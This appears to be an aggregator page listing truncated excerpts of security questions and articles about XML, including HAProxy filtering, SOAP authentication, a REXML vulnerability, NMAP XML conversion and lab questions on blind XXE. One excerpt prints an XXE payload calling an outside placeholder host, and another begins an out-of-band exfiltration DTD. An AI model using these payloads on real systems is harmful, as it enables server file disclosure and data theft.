Collaborate Disseminate
There’s a web application on a server which I have full access to which accepts POST requests on a REST endpoint. The request payload is expected to be an XML document. For request routing and load balancing the server makes use of HAProxy… Continue reading How does my HTTPS POST get blocked based on XML content?
I have been involved in a discussion the other day regarding the implementation of backend-to-backend authentication. The communications between each backend happen via SOAP (XML) message protocol.
Objective:
Authenticate calls originating… Continue reading Authenticating Infrastructure SOAP-based API
I need help with an old CTF. I do not want to search for writeups I just need some hint to where search next since my field of expertese is reversing, not web hacking.
What I have is URL: https://127.0.0.1/challenges/21_task.php?id=1
When … Continue reading need help – CTF 2018 – web/json/html [closed]
I have a case where I need to identify input data. Input data can be in JSON, XML, HTML, or text. In case of JSON or XML, the order doesn’t matter, what matter is the structure, keys name, and values of fields. I need this to identify the … Continue reading Data identifier hash function [closed]
I have the below XML,
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<Response xmlns="http://www.site.ae/g">
<Message xml:id="message">
<Header>
… Continue reading Verifying Signed Xml Generated From Java In NET [migrated]
I keep hearing about the XML round trip vulnerability in version 3.2.4 of the Ruby package REXML. I looked into it myself, of course, and it seems to have something to do with parsing an XML document, then putting it back into XML again, a… Continue reading What is an XML round trip vulnerability?
I have a blind XXE through parameter entities. The payload I used to test it is the following.
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://myip"> %xxe; ]>
I receive a GET request. Next move I tried was serving thi… Continue reading Is it possible to exploit XXE data exfiltration with 1 GET request?
My lab
Kali Linux:192.168.171.134
bWApp Server: http://192.168.171.131
I want to do an exfiltration data via HTTP on this Blind XXE.
I’ll use the Portswigger Payload.
This is the External.DTD:
<!ENTITY % eval "<!ENTITY &a… Continue reading Blind XXE – Exfiltration Data via OOB
NMAP is a wonderful network scanner and its ability to log scan data to files, specifically XML, helps quite a bit. This enables the scan data to be parsed by other tools such as Metasploit’s db_import or even NMAP’s own Zenmap GUI. While XML is grea… Continue reading Converting NMAP XML Files to HTML with xsltproc
[Marquis de Geek] has a profound love of old systems. Tired of writing new emulators from scratch for each project, his newest project EMF generates the emulator for him. An XML document describes the layout of the memory, CPU description, and screen handler. The output is currently a single-page Javascript …read more
Continue reading Procedurally Generated Retrocomputer Emulators